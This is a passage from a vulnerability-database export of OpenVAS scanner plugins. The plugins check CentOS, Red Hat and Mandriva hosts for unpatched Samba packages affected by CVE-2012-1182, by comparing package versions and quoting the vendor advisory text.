isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:57:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of libsmbclient", "modified": "2018-01-08T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881194", "href": "http://plugins.openvas.org/nasl.php?oid=881194", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_id(881194);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:1361412562310870581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870581", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870581\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2018-01-03T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:870581", "href": "http://plugins.openvas.org/nasl.php?oid=870581", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_id(870581);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881228", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881228\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"samba3x on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881179", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881179\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:57:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2018-01-08T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:831574", "href": "http://plugins.openvas.org/nasl.php?oid=831574", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_id(831574);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n 